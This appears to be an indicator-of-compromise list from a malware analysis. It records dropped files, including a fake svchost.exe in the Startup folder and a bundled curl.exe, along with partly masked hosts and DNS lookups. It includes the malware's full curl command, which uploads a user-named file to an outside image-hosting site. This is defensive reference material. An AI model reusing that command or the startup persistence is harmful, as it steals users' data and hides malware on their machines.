Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\svchost.exe
- %TEMP%\curl.exe -F file=@"%ALLUSERSPROFILE%\Application Data\%USERNAME%.jpg" -F Submit=" Bild Hochladen" -H Expect: -o curl.txt --location-trusted --url "http://www.pi###pload.de/upload.php"
- %ALLUSERSPROFILE%\Application Data\%USERNAME%.jpg
- %TEMP%\curl.exe
- %APPDATA%\3dgfx
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\ipadresse[1]
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\xml.utrace[1]
- 'www.pi###pload.de':80
- 'xm#.#trace.de':80
- 'www.sh###my-ip.de':80
- xm#.#trace.de/?qu####
- www.sh###my-ip.de/ipadresse/
- DNS ASK www.pi###pload.de
- DNS ASK xm#.#trace.de
- DNS ASK www.sh###my-ip.de